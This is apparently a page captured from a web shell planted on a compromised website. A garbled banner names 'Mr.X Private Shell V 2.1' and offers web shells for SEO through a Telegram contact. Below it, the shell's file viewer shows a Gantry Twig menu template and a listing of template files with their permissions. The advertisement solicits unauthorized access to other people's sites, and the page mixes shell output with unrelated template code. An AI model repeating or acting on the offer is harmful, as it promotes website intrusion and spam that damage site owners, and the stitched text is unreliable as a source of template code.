__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{% set children = (item.level == 1 ? item.group(group) : item.children) %}
<div class="submenu-level">Level {{ item.level }}</div>
<ul class="submenu-items" data-mm-base="{{ item.path }}" data-mm-base-level="{{ item.level }}">
{%- if item.level > 1 %}
<li>
<a class="menu-item menu-item-back"
data-g5-ajaxify=""
data-g5-ajaxify-params="{{ {'inline': 1, 'group': group}|json_encode|escape('html_attr') }}"
data-g5-ajaxify-target-parent=".submenu-column"
href="{{ gantry.route('menu', id, item.parent.path) }}"
>
{% for i in range(1, item.level-1) %}
<i class="fa fa-fw fa-chevron-left" aria-hidden="true"></i>
{% endfor %}
</a>
</li>
{% endif -%}
{%- for child in children %}
{% set is_particle = child.type == 'particle' or child.type == 'module' %}
<li data-mm-id="{{ child.path }}"
data-mm-level="{{ child.level }}"
{% if is_particle %}
class="g-menu-removable g-menu-item-{{ child.type }}{% if child.options.particle.enabled == false %} g-menu-item-disabled{% endif %}"
data-mm-original-type="{{ child.type }}"
{% else %}
class="{% if child.enabled == false %}g-menu-item-disabled{% endif %}"
{% endif %}
>
{% include 'menu/item.html.twig' with {'item': child, 'target': 'list-' ~ group } %}
</li>
{% endfor -%}
</ul>
<span class="submenu-reorder"><i class="fa fa-fw fa-arrows-h fa-arrows-alt-h" aria-hidden="true"></i></span>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| base.html.twig | File | 1.53 KB | 0664 |
|
| columns.html.twig | File | 909 B | 0664 |
|
| empty.html.twig | File | 195 B | 0664 |
|
| item.html.twig | File | 1.6 KB | 0664 |
|
| list.html.twig | File | 1.6 KB | 0664 |
|